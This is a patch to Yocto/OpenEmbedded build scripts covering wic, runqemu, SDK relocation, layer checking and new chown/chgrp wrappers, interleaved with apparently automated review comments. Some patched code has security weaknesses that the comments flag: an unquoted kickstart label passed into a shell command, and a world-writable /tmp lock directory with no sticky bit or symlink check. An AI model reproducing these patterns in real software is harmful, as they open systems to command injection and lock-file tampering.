@@ -449,3 +453,37 @@ class Partition():
449 453
450 mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path) 454 mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path)
451 exec_native_cmd(mkswap_cmd, native_sysroot) 455 exec_native_cmd(mkswap_cmd, native_sysroot)
456
457 def check_for_Y2038_problem(self, rootfs, native_sysroot):
458 """
459 Check if the filesystem is affected by the Y2038 problem
460 (Y2038 problem = 32 bit time_t overflow in January 2038)
461 """
462 def get_err_str(part):
463 err = "The {} filesystem {} has no Y2038 support."
464 if part.mountpoint:
465 args = [part.fstype, "mounted at %s" % part.mountpoint]
466 elif part.label:
467 args = [part.fstype, "labeled '%s'" % part.label]
468 elif part.part_name:
469 args = [part.fstype, "in partition '%s'" % part.part_name]
470 else:
471 args = [part.fstype, "in partition %s" % part.num]
472 return err.format(*args)
473
474 # ext2 and ext3 are always affected by the Y2038 problem
475 if self.fstype in ["ext2", "ext3"]:
476 logger.warn(get_err_str(self))
477 return
478
479 ret, out = exec_native_cmd("dumpe2fs %s" % rootfs, native_sysroot)
480
481 # if ext4 is affected by the Y2038 problem depends on the inode size
482 for line in out.splitlines():
483 if line.startswith("Inode size:"):
484 size = int(line.split(":")[1].strip())
485 if size < 256:
486 logger.warn("%s Inodes (of size %d) are too small." %
487 (get_err_str(self), size))
488 break
489
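Review bot: `logger.warn()` at new lines 476 and 486 is the deprecated alias of `logger.warning()` and was removed in Python 3.13, so on such an interpreter the Y2038 check would raise AttributeError exactly when it has something to report; use `logger.warning(get_err_str(self))` and the same for the inode-size message. The return code of `dumpe2fs` (`ret`, new line 479) is not examined in this method. If `exec_native_cmd` does not raise on failure, a failed run silently yields no "Inode size:" line and no warning.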
diff --git a/scripts/lib/wic/pluginbase.py b/scripts/lib/wic/pluginbase.py
index d9b4e57747..b64568339b 100644
--- a/scripts/lib/wic/pluginbase.py
+++ b/scripts/lib/wic/pluginbase.py
@@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin']
9 9
10import os 10import os
11import logging 11import logging
12import types
12 13
13from collections import defaultdict 14from collections import defaultdict
14from importlib.machinery import SourceFileLoader 15import importlib
16import importlib.util
15 17
16from wic import WicError 18from wic import WicError
17from wic.misc import get_bitbake_var 19from wic.misc import get_bitbake_var
@@ -54,7 +56,9 @@ class PluginMgr:
54 mname = fname[:-3] 56 mname = fname[:-3]
55 mpath = os.path.join(ppath, fname) 57 mpath = os.path.join(ppath, fname)
56 logger.debug("loading plugin module %s", mpath) 58 logger.debug("loading plugin module %s", mpath)
57 SourceFileLoader(mname, mpath).load_module() 59 spec = importlib.util.spec_from_file_location(mname, mpath)
60 module = importlib.util.module_from_spec(spec)
61 spec.loader.exec_module(module)
58 62
59 return PLUGINS.get(ptype) 63 return PLUGINS.get(ptype)
60 64
diff --git a/scripts/lib/wic/plugins/imager/direct.py b/scripts/lib/wic/plugins/imager/direct.py
index 7e1c1c03ab..42704d1e10 100644
--- a/scripts/lib/wic/plugins/imager/direct.py
+++ b/scripts/lib/wic/plugins/imager/direct.py
@@ -115,7 +115,7 @@ class DirectPlugin(ImagerPlugin):
115 updated = False 115 updated = False
116 for part in self.parts: 116 for part in self.parts:
117 if not part.realnum or not part.mountpoint \ 117 if not part.realnum or not part.mountpoint \
118 or part.mountpoint == "/": 118 or part.mountpoint == "/" or not (part.mountpoint.startswith('/') or part.mountpoint == "swap"):
119 continue 119 continue
120 120
121 if part.use_uuid: 121 if part.use_uuid:
diff --git a/scripts/lib/wic/plugins/source/bootimg-efi.py b/scripts/lib/wic/plugins/source/bootimg-efi.py
index 2cfdc10ecd..05e8471116 100644
--- a/scripts/lib/wic/plugins/source/bootimg-efi.py
+++ b/scripts/lib/wic/plugins/source/bootimg-efi.py
@@ -277,6 +277,13 @@ class BootimgEFIPlugin(SourcePlugin):
277 logger.debug("Added %d extra blocks to %s to get to %d total blocks", 277 logger.debug("Added %d extra blocks to %s to get to %d total blocks",
278 extra_blocks, part.mountpoint, blocks) 278 extra_blocks, part.mountpoint, blocks)
279 279
280 # required for compatibility with certain devices expecting file system
281 # block count to be equal to partition block count
282 if blocks < part.fixed_size:
283 blocks = part.fixed_size
284 logger.debug("Overriding %s to %d total blocks for compatibility",
285 part.mountpoint, blocks)
286
280 # dosfs image, created by mkdosfs 287 # dosfs image, created by mkdosfs
281 bootimg = "%s/boot.img" % cr_workdir 288 bootimg = "%s/boot.img" % cr_workdir
282 289
diff --git a/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
index f2639e7004..32e47f1831 100644
--- a/scripts/lib/wic/plugins/source/bootimg-pcbios.py
+++ b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
@@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin):
186 # dosfs image, created by mkdosfs 186 # dosfs image, created by mkdosfs
187 bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno) 187 bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno)
188 188
189 dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \ 189 label = part.label if part.label else "boot"
190 (part.fsuuid, bootimg, blocks) 190
191 dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \
192 (label, part.fsuuid, bootimg, blocks)
191 exec_native_cmd(dosfs_cmd, native_sysroot) 193 exec_native_cmd(dosfs_cmd, native_sysroot)
192 194
193 mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir) 195 mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir)
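Review bot: `part.label` is now interpolated unquoted into the `mkdosfs` command line (new lines 191-192), and `exec_native_cmd` appears to run its argument through a shell, so a label containing spaces or shell metacharacters changes the command instead of being passed as one argument. The label comes from the kickstart file, so this is mainly a robustness issue for build inputs, but quoting it is cheap: `(shlex.quote(label), part.fsuuid, bootimg, blocks)` with `import shlex` at the top of the file. The enclosing method starts and ends outside the hunk.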
diff --git a/scripts/nativesdk-intercept/chgrp b/scripts/nativesdk-intercept/chgrp
new file mode 100755
index 0000000000..30cc417d3a
--- /dev/null
+++ b/scripts/nativesdk-intercept/chgrp
@@ -0,0 +1,27 @@
1#!/usr/bin/env python3
2#
3# Wrapper around 'chgrp' that redirects to root in all cases
4
5import os
6import shutil
7import sys
8
9# calculate path to the real 'chgrp'
10path = os.environ['PATH']
11path = path.replace(os.path.dirname(sys.argv[0]), '')
12real_chgrp = shutil.which('chgrp', path=path)
13
14args = list()
15
16found = False
17for i in sys.argv:
18 if i.startswith("-"):
19 args.append(i)
20 continue
21 if not found:
22 args.append("root")
23 found = True
24 else:
25 args.append(i)
26
27os.execv(real_chgrp, args)
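Review bot: The loop at new line 17 iterates over all of `sys.argv`, so the first non-option it sees is the script's own path: that element is replaced by `root`, `found` is set, and the group argument the caller passed is then appended unchanged. The real `chgrp` is therefore executed with `argv[0]` set to `root` and the original group still in place, which is the opposite of what the header comment describes. Starting from `args = [real_chgrp]` and looping with `for i in sys.argv[1:]:` fixes both; scripts/nativesdk-intercept/chown (new lines 14-27) has the same loop. `shutil.which()` can also return `None`, in which case `os.execv` fails with a TypeError, so a check on `real_chgrp` before the exec is worth adding.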
diff --git a/scripts/nativesdk-intercept/chown b/scripts/nativesdk-intercept/chown
new file mode 100755
index 0000000000..3914b3e384
--- /dev/null
+++ b/scripts/nativesdk-intercept/chown
@@ -0,0 +1,27 @@
1#!/usr/bin/env python3
2#
3# Wrapper around 'chown' that redirects to root in all cases
4
5import os
6import shutil
7import sys
8
9# calculate path to the real 'chown'
10path = os.environ['PATH']
11path = path.replace(os.path.dirname(sys.argv[0]), '')
12real_chown = shutil.which('chown', path=path)
13
14args = list()
15
16found = False
17for i in sys.argv:
18 if i.startswith("-"):
19 args.append(i)
20 continue
21 if not found:
22 args.append("root:root")
23 found = True
24 else:
25 args.append(i)
26
27os.execv(real_chown, args)
diff --git a/scripts/oe-depends-dot b/scripts/oe-depends-dot
index 5eb3e12769..1c2d51c6ec 100755
--- a/scripts/oe-depends-dot
+++ b/scripts/oe-depends-dot
@@ -15,7 +15,7 @@ class Dot(object):
15 def __init__(self): 15 def __init__(self):
16 parser = argparse.ArgumentParser( 16 parser = argparse.ArgumentParser(
17 description="Analyse recipe-depends.dot generated by bitbake -g", 17 description="Analyse recipe-depends.dot generated by bitbake -g",
18 epilog="Use %(prog)s --help to get help") 18 formatter_class=argparse.RawDescriptionHelpFormatter)
19 parser.add_argument("dotfile", 19 parser.add_argument("dotfile",
20 help = "Specify the dotfile", nargs = 1, action='store', default='') 20 help = "Specify the dotfile", nargs = 1, action='store', default='')
21 parser.add_argument("-k", "--key", 21 parser.add_argument("-k", "--key",
@@ -32,6 +32,21 @@ class Dot(object):
32 " For example, A->B, B->C, A->C, then A->C can be removed.", 32 " For example, A->B, B->C, A->C, then A->C can be removed.",
33 action="store_true", default=False) 33 action="store_true", default=False)
34 34
35 parser.epilog = """
36Examples:
37First generate the .dot file:
38 bitbake -g core-image-minimal
39
40To find out why a package is being built:
41 %(prog)s -k <package> -w ./task-depends.dot
42
43To find out what a package depends on:
44 %(prog)s -k <package> -d ./task-depends.dot
45
46Reduce the .dot file packages only, no tasks:
47 %(prog)s -r ./task-depends.dot
48"""
49
35 self.args = parser.parse_args() 50 self.args = parser.parse_args()
36 51
37 if len(sys.argv) != 3 and len(sys.argv) < 5: 52 if len(sys.argv) != 3 and len(sys.argv) < 5:
@@ -99,6 +114,10 @@ class Dot(object):
99 if key == "meta-world-pkgdata": 114 if key == "meta-world-pkgdata":
100 continue 115 continue
101 dep = m.group(2) 116 dep = m.group(2)
117 key = key.split('.')[0]
118 dep = dep.split('.')[0]
119 if key == dep:
120 continue
102 if key in depends: 121 if key in depends:
103 if not key in depends[key]: 122 if not key in depends[key]:
104 depends[key].add(dep) 123 depends[key].add(dep)
diff --git a/scripts/oe-pkgdata-browser b/scripts/oe-pkgdata-browser
index 8d223185a4..65a6ee956e 100755
--- a/scripts/oe-pkgdata-browser
+++ b/scripts/oe-pkgdata-browser
@@ -236,6 +236,8 @@ class PkgUi():
236 update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False) 236 update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False)
237 237
238 def load_recipes(self): 238 def load_recipes(self):
239 if not os.path.exists(pkgdata):
240 sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata)
239 for recipe in sorted(os.listdir(pkgdata)): 241 for recipe in sorted(os.listdir(pkgdata)):
240 if os.path.isfile(os.path.join(pkgdata, recipe)): 242 if os.path.isfile(os.path.join(pkgdata, recipe)):
241 self.recipe_iters[recipe] = self.recipe_store.append([recipe]) 243 self.recipe_iters[recipe] = self.recipe_store.append([recipe])
diff --git a/scripts/oe-setup-builddir b/scripts/oe-setup-builddir
index 30eaa8efbe..5a51fa793f 100755
--- a/scripts/oe-setup-builddir
+++ b/scripts/oe-setup-builddir
@@ -113,10 +113,10 @@ if [ ! -z "$SHOWYPDOC" ]; then
113 cat <<EOM 113 cat <<EOM
114The Yocto Project has extensive documentation about OE including a reference 114The Yocto Project has extensive documentation about OE including a reference
115manual which can be found at: 115manual which can be found at:
116 http://yoctoproject.org/documentation 116 https://docs.yoctoproject.org
117 117
118For more information about OpenEmbedded see their website: 118For more information about OpenEmbedded see their website:
119 http://www.openembedded.org/ 119 https://www.openembedded.org/
120 120
121EOM 121EOM
122# unset SHOWYPDOC 122# unset SHOWYPDOC
diff --git a/scripts/pybootchartgui/pybootchartgui/draw.py b/scripts/pybootchartgui/pybootchartgui/draw.py
index 53324b9f8b..fc708b55c3 100644
--- a/scripts/pybootchartgui/pybootchartgui/draw.py
+++ b/scripts/pybootchartgui/pybootchartgui/draw.py
@@ -267,11 +267,14 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range):
267 # avoid divide by zero 267 # avoid divide by zero
268 if max_y == 0: 268 if max_y == 0:
269 max_y = 1.0 269 max_y = 1.0
270 xscale = float (chart_bounds[2]) / (max_x - x_shift) 270 if (max_x - x_shift):
271 xscale = float (chart_bounds[2]) / (max_x - x_shift)
272 else:
273 xscale = float (chart_bounds[2])
271 # If data_range is given, scale the chart so that the value range in 274 # If data_range is given, scale the chart so that the value range in
272 # data_range matches the chart bounds exactly. 275 # data_range matches the chart bounds exactly.
273 # Otherwise, scale so that the actual data matches the chart bounds. 276 # Otherwise, scale so that the actual data matches the chart bounds.
274 if data_range: 277 if data_range and (data_range[1] - data_range[0]):
275 yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0]) 278 yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0])
276 ybase = data_range[0] 279 ybase = data_range[0]
277 else: 280 else:
diff --git a/scripts/pybootchartgui/pybootchartgui/parsing.py b/scripts/pybootchartgui/pybootchartgui/parsing.py
index b42dac6b88..9d6787ec5a 100644
--- a/scripts/pybootchartgui/pybootchartgui/parsing.py
+++ b/scripts/pybootchartgui/pybootchartgui/parsing.py
@@ -128,7 +128,7 @@ class Trace:
128 def compile(self, writer): 128 def compile(self, writer):
129 129
130 def find_parent_id_for(pid): 130 def find_parent_id_for(pid):
131 if pid is 0: 131 if pid == 0:
132 return 0 132 return 0
133 ppid = self.parent_map.get(pid) 133 ppid = self.parent_map.get(pid)
134 if ppid: 134 if ppid:
diff --git a/scripts/relocate_sdk.py b/scripts/relocate_sdk.py
index 8c0fdb986a..8079d13750 100755
--- a/scripts/relocate_sdk.py
+++ b/scripts/relocate_sdk.py
@@ -97,11 +97,12 @@ def change_interpreter(elf_file_name):
97 if (len(new_dl_path) >= p_filesz): 97 if (len(new_dl_path) >= p_filesz):
98 print("ERROR: could not relocate %s, interp size = %i and %i is needed." \ 98 print("ERROR: could not relocate %s, interp size = %i and %i is needed." \
99 % (elf_file_name, p_memsz, len(new_dl_path) + 1)) 99 % (elf_file_name, p_memsz, len(new_dl_path) + 1))
100 break 100 return False
101 dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path)) 101 dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path))
102 f.seek(p_offset) 102 f.seek(p_offset)
103 f.write(dl_path) 103 f.write(dl_path)
104 break 104 break
105 return True
105 106
106def change_dl_sysdirs(elf_file_name): 107def change_dl_sysdirs(elf_file_name):
107 if arch == 32: 108 if arch == 32:
@@ -215,6 +216,7 @@ else:
215 216
216executables_list = sys.argv[3:] 217executables_list = sys.argv[3:]
217 218
219errors = False
218for e in executables_list: 220for e in executables_list:
219 perms = os.stat(e)[stat.ST_MODE] 221 perms = os.stat(e)[stat.ST_MODE]
220 if os.access(e, os.W_OK|os.R_OK): 222 if os.access(e, os.W_OK|os.R_OK):
@@ -240,7 +242,8 @@ for e in executables_list:
240 arch = get_arch() 242 arch = get_arch()
241 if arch: 243 if arch:
242 parse_elf_header() 244 parse_elf_header()
243 change_interpreter(e) 245 if not change_interpreter(e):
246 errors = True
244 change_dl_sysdirs(e) 247 change_dl_sysdirs(e)
245 248
246 """ change permissions back """ 249 """ change permissions back """
@@ -253,3 +256,6 @@ for e in executables_list:
253 print("New file size for %s is different. Looks like a relocation error!", e) 256 print("New file size for %s is different. Looks like a relocation error!", e)
254 sys.exit(-1) 257 sys.exit(-1)
255 258
259if errors:
260 print("Relocation of one or more executables failed.")
261 sys.exit(-1)
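Review bot: The size-check message left as context in the last hunk passes `e` as a second argument to `print`, so it prints a literal `%s` followed by the file name instead of a formatted message. Since this commit tightens error reporting, it should read `print("New file size for %s is different. Looks like a relocation error!" % e)`. The new summary `print("Relocation of one or more executables failed.")` goes to stdout like the per-file error in `change_interpreter`; sending both to `sys.stderr` would keep failures visible when stdout is captured or discarded. `change_dl_sysdirs(e)` still runs after a failed `change_interpreter(e)` and its result is not folded into `errors`; whether it can fail cannot be told from here, as its body lies outside the hunks.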
diff --git a/scripts/runqemu b/scripts/runqemu
index cc87ea871a..4dfc0e2d38 100755
--- a/scripts/runqemu
+++ b/scripts/runqemu
@@ -764,7 +764,7 @@ class BaseConfig(object):
764 raise RunQemuError('BIOS not found: %s' % bios_match_name) 764 raise RunQemuError('BIOS not found: %s' % bios_match_name)
765 765
766 if not os.path.exists(self.bios): 766 if not os.path.exists(self.bios):
767 raise RunQemuError("KERNEL %s not found" % self.bios) 767 raise RunQemuError("BIOS %s not found" % self.bios)
768 768
769 769
770 def check_mem(self): 770 def check_mem(self):
@@ -974,17 +974,14 @@ class BaseConfig(object):
974 else: 974 else:
975 self.nfs_server = '192.168.7.1' 975 self.nfs_server = '192.168.7.1'
976 976
977 # Figure out a new nfs_instance to allow multiple qemus running. 977 nfsd_port = 3048 + self.nfs_instance
978 ps = subprocess.check_output(("ps", "auxww")).decode('utf-8') 978 lockdir = "/tmp/qemu-port-locks"
979 pattern = '/bin/unfsd .* -i .*\.pid -e .*/exports([0-9]+) ' 979 self.make_lock_dir(lockdir)
980 all_instances = re.findall(pattern, ps, re.M) 980 while not self.check_free_port('localhost', nfsd_port, lockdir):
981 if all_instances: 981 self.nfs_instance += 1
982 all_instances.sort(key=int) 982 nfsd_port += 1
983 self.nfs_instance = int(all_instances.pop()) + 1
984
985 nfsd_port = 3049 + 2 * self.nfs_instance
986 mountd_port = 3048 + 2 * self.nfs_instance
987 983
984 mountd_port = nfsd_port
988 # Export vars for runqemu-export-rootfs 985 # Export vars for runqemu-export-rootfs
989 export_dict = { 986 export_dict = {
990 'NFS_INSTANCE': self.nfs_instance, 987 'NFS_INSTANCE': self.nfs_instance,
@@ -1034,6 +1031,17 @@ class BaseConfig(object):
1034 self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % ( 1031 self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % (
1035 self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper'))) 1032 self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper')))
1036 1033
1034 def make_lock_dir(self, lockdir):
1035 if not os.path.exists(lockdir):
1036 # There might be a race issue when multi runqemu processess are
1037 # running at the same time.
1038 try:
1039 os.mkdir(lockdir)
1040 os.chmod(lockdir, 0o777)
1041 except FileExistsError:
1042 pass
1043 return
1044
1037 def setup_slirp(self): 1045 def setup_slirp(self):
1038 """Setup user networking""" 1046 """Setup user networking"""
1039 1047
@@ -1052,14 +1060,7 @@ class BaseConfig(object):
1052 mac = 2 1060 mac = 2
1053 1061
1054 lockdir = "/tmp/qemu-port-locks" 1062 lockdir = "/tmp/qemu-port-locks"
1055 if not os.path.exists(lockdir): 1063 self.make_lock_dir(lockdir)
1056 # There might be a race issue when multi runqemu processess are
1057 # running at the same time.
1058 try:
1059 os.mkdir(lockdir)
1060 os.chmod(lockdir, 0o777)
1061 except FileExistsError:
1062 pass
1063 1064
1064 # Find a free port to avoid conflicts 1065 # Find a free port to avoid conflicts
1065 for p in ports[:]: 1066 for p in ports[:]:
@@ -1099,14 +1100,7 @@ class BaseConfig(object):
1099 logger.error("ip: %s" % ip) 1100 logger.error("ip: %s" % ip)
1100 raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found") 1101 raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found")
1101 1102
1102 if not os.path.exists(lockdir): 1103 self.make_lock_dir(lockdir)
1103 # There might be a race issue when multi runqemu processess are
1104 # running at the same time.
1105 try:
1106 os.mkdir(lockdir)
1107 os.chmod(lockdir, 0o777)
1108 except FileExistsError:
1109 pass
1110 1104
1111 cmd = (ip, 'link') 1105 cmd = (ip, 'link')
1112 logger.debug('Running %s...' % str(cmd)) 1106 logger.debug('Running %s...' % str(cmd))
@@ -1328,6 +1322,8 @@ class BaseConfig(object):
1328 1322
1329 for ovmf in self.ovmf_bios: 1323 for ovmf in self.ovmf_bios:
1330 format = ovmf.rsplit('.', 1)[-1] 1324 format = ovmf.rsplit('.', 1)[-1]
1325 if format == "bin":
1326 format = "raw"
1331 self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf) 1327 self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf)
1332 1328
1333 self.qemu_opt += ' ' + self.qemu_opt_script 1329 self.qemu_opt += ' ' + self.qemu_opt_script
@@ -1421,13 +1417,13 @@ class BaseConfig(object):
1421 logger.debug('Running %s' % str(cmd)) 1417 logger.debug('Running %s' % str(cmd))
1422 subprocess.check_call(cmd) 1418 subprocess.check_call(cmd)
1423 self.release_taplock() 1419 self.release_taplock()
1424 self.release_portlock()
1425 1420
1426 if self.nfs_running: 1421 if self.nfs_running:
1427 logger.info("Shutting down the userspace NFS server...") 1422 logger.info("Shutting down the userspace NFS server...")
1428 cmd = ("runqemu-export-rootfs", "stop", self.rootfs) 1423 cmd = ("runqemu-export-rootfs", "stop", self.rootfs)
1429 logger.debug('Running %s' % str(cmd)) 1424 logger.debug('Running %s' % str(cmd))
1430 subprocess.check_call(cmd) 1425 subprocess.check_call(cmd)
1426 self.release_portlock()
1431 1427
1432 if self.saved_stty: 1428 if self.saved_stty:
1433 subprocess.check_call(("stty", self.saved_stty)) 1429 subprocess.check_call(("stty", self.saved_stty))
@@ -1514,7 +1510,8 @@ def main():
1514 1510
1515 def sigterm_handler(signum, frame): 1511 def sigterm_handler(signum, frame):
1516 logger.info("SIGTERM received") 1512 logger.info("SIGTERM received")
1517 os.kill(config.qemupid, signal.SIGTERM) 1513 if config.qemupid:
1514 os.kill(config.qemupid, signal.SIGTERM)
1518 config.cleanup() 1515 config.cleanup()
1519 # Deliberately ignore the return code of 'tput smam'. 1516 # Deliberately ignore the return code of 'tput smam'.
1520 subprocess.call(["tput", "smam"]) 1517 subprocess.call(["tput", "smam"])
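Review bot: `make_lock_dir` carries over `os.chmod(lockdir, 0o777)` from the two copies it replaces, so `/tmp/qemu-port-locks` is world-writable without the sticky bit and any local account can delete or replace lock files that another user's runqemu created there. `os.chmod(lockdir, 0o1777)` would limit removal to each file's owner. The helper also accepts whatever already sits at that fixed path: when `os.path.exists(lockdir)` is true, nothing checks that the entry is a real directory rather than a symlink or regular file, so an `os.lstat` check before use would be worth adding. The new `while not self.check_free_port('localhost', nfsd_port, lockdir)` loop in the NFS setup has no upper bound on the ports it will try, and the trailing `return` in the helper is redundant. The helper would also benefit from a docstring such as `"""Create the shared lock directory if it does not exist yet."""`.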
diff --git a/scripts/verify-bashisms b/scripts/verify-bashisms
index fb0cc719ea..14d8c298e9 100755
--- a/scripts/verify-bashisms
+++ b/scripts/verify-bashisms
@@ -100,7 +100,7 @@ if __name__=='__main__':
100 args = parser.parse_args() 100 args = parser.parse_args()
101 101
102 if shutil.which("checkbashisms.pl") is None: 102 if shutil.which("checkbashisms.pl") is None:
103 print("Cannot find checkbashisms.pl on $PATH, get it from https://anonscm.debian.org/cgit/collab-maint/devscripts.git/plain/scripts/checkbashisms.pl") 103 print("Cannot find checkbashisms.pl on $PATH, get it from https://salsa.debian.org/debian/devscripts/raw/master/scripts/checkbashisms.pl")
104 sys.exit(1) 104 sys.exit(1)
105 105
106 # The order of defining the worker function, 106 # The order of defining the worker function,
diff --git a/scripts/wic b/scripts/wic
index a741aed364..99a8a97ccb 100755
--- a/scripts/wic
+++ b/scripts/wic
@@ -22,9 +22,9 @@ import sys
22import argparse 22import argparse
23import logging 23import logging
24import subprocess 24import subprocess
25import shutil
25 26
26from collections import namedtuple 27from collections import namedtuple
27from distutils import spawn
28 28
29# External modules 29# External modules
30scripts_path = os.path.dirname(os.path.realpath(__file__)) 30scripts_path = os.path.dirname(os.path.realpath(__file__))
@@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'):
47 break 47 break
48 sdkroot = os.path.dirname(sdkroot) 48 sdkroot = os.path.dirname(sdkroot)
49 49
50bitbake_exe = spawn.find_executable('bitbake') 50bitbake_exe = shutil.which('bitbake')
51if bitbake_exe: 51if bitbake_exe:
52 bitbake_path = scriptpath.add_bitbake_lib_path() 52 bitbake_path = scriptpath.add_bitbake_lib_path()
53 import bb 53 import bb
@@ -206,7 +206,7 @@ def wic_create_subcommand(options, usage_str):
206 logger.info(" (Please check that the build artifacts for the machine") 206 logger.info(" (Please check that the build artifacts for the machine")
207 logger.info(" selected in local.conf actually exist and that they") 207 logger.info(" selected in local.conf actually exist and that they")
208 logger.info(" are the correct artifacts for the image (.wks file)).\n") 208 logger.info(" are the correct artifacts for the image (.wks file)).\n")
209 raise WicError("The artifact that couldn't be found was %s:\n %s", not_found, not_found_dir) 209 raise WicError("The artifact that couldn't be found was %s:\n %s" % (not_found, not_found_dir))
210 210
211 krootfs_dir = options.rootfs_dir 211 krootfs_dir = options.rootfs_dir
212 if krootfs_dir is None: 212 if krootfs_dir is None:
diff --git a/scripts/yocto-check-layer b/scripts/yocto-check-layer
index b7c83c8b54..dd930cdddd 100755
--- a/scripts/yocto-check-layer
+++ b/scripts/yocto-check-layer
@@ -24,7 +24,7 @@ import scriptpath
24scriptpath.add_oe_lib_path() 24scriptpath.add_oe_lib_path()
25scriptpath.add_bitbake_lib_path() 25scriptpath.add_bitbake_lib_path()
26 26
27from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_signatures, check_bblayers 27from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_layer_dependencies, get_signatures, check_bblayers
28from oeqa.utils.commands import get_bb_vars 28from oeqa.utils.commands import get_bb_vars
29 29
30PROGNAME = 'yocto-check-layer' 30PROGNAME = 'yocto-check-layer'
@@ -51,6 +51,8 @@ def main():
51 help='File to output log (optional)', action='store') 51 help='File to output log (optional)', action='store')
52 parser.add_argument('--dependency', nargs="+", 52 parser.add_argument('--dependency', nargs="+",
53 help='Layers to process for dependencies', action='store') 53 help='Layers to process for dependencies', action='store')
54 parser.add_argument('--no-auto-dependency', help='Disable automatic testing of dependencies',
55 action='store_true')
54 parser.add_argument('--machines', nargs="+", 56 parser.add_argument('--machines', nargs="+",
55 help='List of MACHINEs to be used during testing', action='store') 57 help='List of MACHINEs to be used during testing', action='store')
56 parser.add_argument('--additional-layers', nargs="+", 58 parser.add_argument('--additional-layers', nargs="+",
@@ -121,6 +123,21 @@ def main():
121 if not layers: 123 if not layers:
122 return 1 124 return 1
123 125
126 # Find all dependencies, and get them checked too
127 if not args.no_auto_dependency:
128 depends = []
129 for layer in layers:
130 layer_depends = get_layer_dependencies(layer, dep_layers, logger)
131 if layer_depends:
132 for d in layer_depends:
133 if d not in depends:
134 depends.append(d)
135
136 for d in depends:
137 if d not in layers:
138 logger.info("Adding %s to the list of layers to test, as a dependency", d['name'])
139 layers.append(d)
140
124 shutil.copyfile(bblayersconf, bblayersconf + '.backup') 141 shutil.copyfile(bblayersconf, bblayersconf + '.backup')
125 def cleanup_bblayers(signum, frame): 142 def cleanup_bblayers(signum, frame):
126 shutil.copyfile(bblayersconf + '.backup', bblayersconf) 143 shutil.copyfile(bblayersconf + '.backup', bblayersconf)
@@ -138,6 +155,9 @@ def main():
138 layer['type'] == LayerType.ERROR_BSP_DISTRO: 155 layer['type'] == LayerType.ERROR_BSP_DISTRO:
139 continue 156 continue
140 157
158 # Reset to a clean backup copy for each run
159 shutil.copyfile(bblayersconf + '.backup', bblayersconf)
160
141 if check_bblayers(bblayersconf, layer['path'], logger): 161 if check_bblayers(bblayersconf, layer['path'], logger):
142 logger.info("%s already in %s. To capture initial signatures, layer under test should not present " 162 logger.info("%s already in %s. To capture initial signatures, layer under test should not present "
143 "in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name'])) 163 "in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name']))
@@ -149,17 +169,13 @@ def main():
149 logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'], 169 logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'],
150 layer['path'])) 170 layer['path']))
151 171
152 shutil.copyfile(bblayersconf + '.backup', bblayersconf)
153
154 missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) 172 missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger)
155 if not missing_dependencies: 173 if not missing_dependencies:
156 for additional_layer in additional_layers: 174 for additional_layer in additional_layers:
157 if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger): 175 if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger):
158 missing_dependencies = True 176 missing_dependencies = True
159 break 177 break
160 if not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) or \ 178 if missing_dependencies:
161 any(map(lambda additional_layer: not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger),
162 additional_layers)):
163 logger.info('Skipping %s due to missing dependencies.' % layer['name']) 179 logger.info('Skipping %s due to missing dependencies.' % layer['name'])
164 results[layer['name']] = None 180 results[layer['name']] = None
165 results_status[layer['name']] = 'SKIPPED (Missing dependencies)' 181 results_status[layer['name']] = 'SKIPPED (Missing dependencies)'